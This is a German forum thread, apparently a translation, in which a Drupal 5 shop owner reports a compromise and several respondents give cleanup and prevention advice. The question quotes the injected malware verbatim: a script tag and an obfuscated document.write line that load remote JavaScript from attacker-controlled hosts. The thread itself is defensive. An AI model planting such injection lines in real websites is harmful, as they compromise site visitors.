Es handelt sich hier um einen Onlineshop basierend auf Drupal 5.
Plötzlich funktionierte es nicht mehr. Beim Aufrufen der Site trat dieser Fehler auf:
Analysefehler: Syntaxfehler, unerwartetes „<“ in /home/public_html/index.php in Zeile 38
Bei näherer Betrachtung fand ich am Ende der index.php die folgenden beiden Zeilen:
<script type="text/javascript" src="http://blog.nodisposable.com:8080/Hibernate.js"></script>
<!--7379ba6e55616ea66ac9d812fc0597ba-->
Nach dem manuellen Entfernen dieser beiden Zeilen scheint die Site wieder einwandfrei zu funktionieren.
Nachdem mir aber weitere Probleme (beim Bearbeiten von Seiten) gemeldet wurden, fand ich heraus, dass eigentlich alle *.js-Dateien "infiziert" sind. Sie alle enthalten am Ende eine zusätzliche Zeile:
document.write('<s'+'cript type="text/javascript" src="http://blog.nodisposable.com:8080/Hibernate.js"></scr'+'ipt>');
Wurde diese Site gehackt? Beim Googeln nach „blog.nodisposable.com“ kommt nichts Interessantes dabei heraus. Die Site selbst scheint legitim zu sein. Sie wurde wahrscheinlich selbst gehackt?
Kann mir jemand erklären, wie das passieren konnte? Was kann ich tun, um das rückgängig zu machen? Und was kann ich tun, um das in Zukunft zu vermeiden?
Aktualisieren
Nach dem Wiederherstellen einer Sicherungskopie der Website (nicht der Datenbank) passierte es erneut, aber jetzt zeigte der Skript-Tag auf dolfy.sedonahyperbarics.com:8080/XHTML.js.
Offenbar wurden auch viele zufällige Drupal-Benutzerkonten erstellt. Dies könnte also ein Zeichen dafür sein, dass es sich tatsächlich um eine Drupal-Sicherheitslücke handelte.
Wir haben sie entfernt und die Erstellung von Benutzerkonten nur auf Administratoren beschränkt (das hätte von Anfang an so sein sollen, ich weiß :-s). Wir haben auch das Administrator-Benutzerkennwort in etwas geändertmehr sicher.
Hoffen wir, dass es jetzt nicht wiederkommt.
Antwort1
Wenn es gehackt wurde, wissen Sie nicht, ob eine Hintertür installiert wurde.
Nach einer Neuformatierung müssen Sie möglicherweise eine Neuinstallation von einer zweifelsfrei funktionierenden Sicherungskopie durchführen.
Vertrauen Sie niemals einem System, in dem sich ein Eindringling befunden hat.
Um dies in Zukunft zu verhindern, müssen Sie sich über Updates auf dem Laufenden halten und Listen abonnieren, die über Schwachstellen und Best Practices für die von Ihnen ausgeführte Software auf dem Laufenden gehalten werden (Drupal-Listen, Sicherheitslisten Ihrer Plattform usw.). Außerdem müssen Sie Dienste nur auf Benutzer beschränken, die für die Verwendung des Systems erforderlich sind, sichere Passwörter verwenden, nichts im Klartext tun und alles andere im Rahmen der Best Practices für Sicherheit tun, das weit über den Kontext der Antwort hier hinausgeht. Und führen Sie gute Backups durch und installieren Sie eine Angriffserkennung (z. B. ein Tripwire-ähnliches System), um nach Eindringlingsaktivitäten zu suchen.
Antwort2
Ja, ich fürchte, Sie sind infiziert. Das „Wie“ lässt sich leider nicht sagen, ohne VIEL mehr Zeit und Mühe zu investieren. Es könnte eine Schwachstelle in Ihrer Drupal-Installation (oder einem ihrer Module) gewesen sein, es könnte eine Schwachstelle in einer anderen App auf demselben Server gewesen sein, es könnte ein schwaches (oder gestohlenes) FTP-Passwort gewesen sein usw. Es gibt viele mögliche Einstiegspunkte.
Antwort3
Ich habe etwas sehr Ähnliches (fast identisches) gesehen, aber nicht im Zusammenhang mit Drupal, und es war definitiv ein Hack.
Wie die anderen sagen, ist es schwer, das zu wissen, ohne weitere Informationen über Ihre Umgebung. Sie können die Bereitstellung schnell blockieren, indem Sie eine Anweisung in Ihre .htaccess-Datei einfügen, die alle Anfragen an diese .js-Datei ablehnt oder umleitet.
Antwort4
Obwohl dies ausschließlich auf meiner eigenen Erfahrung beruht, beruhte jeder Hack dieser Art, insbesondere bei einer erneuten Infektion, darauf, dass jemand mit FTP-Zugriff auf den Server seinen lokalen Rechner infizierte und die Anmeldeinformationen gestohlen wurden. Sie sollten die FTP-Protokolle überprüfen und sicherstellen, dass Sie alle IP-Adressen und Updates als gültig erkennen. Wenn dies der Fall ist, sollten Sie dies dort ganz einfach erkennen können.